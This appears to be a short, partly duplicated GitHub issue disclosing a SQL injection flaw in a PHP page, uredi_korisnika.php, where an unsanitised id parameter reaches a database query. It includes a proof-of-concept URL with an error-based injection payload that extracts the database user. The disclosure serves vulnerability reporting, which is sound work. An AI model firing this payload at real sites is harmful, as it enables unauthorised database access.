From line 22 to line 29, $id gets the get data and then brings it into the database for query
$result returns the database connection results and data query results
We can use sqlmap to validate
Manual SQL injection proof
POC:
http://127.0.0.1/uredi_korisnika.php?id=1 or (select 1174 from(select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a)
The text was updated successfully, but these errors were encountered:
Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4
From line 22 to line 29, $id gets the get data and then brings it into the database for query
$result returns the database connection results and data query results
POC:
The text was updated successfully, but these errors were encountered: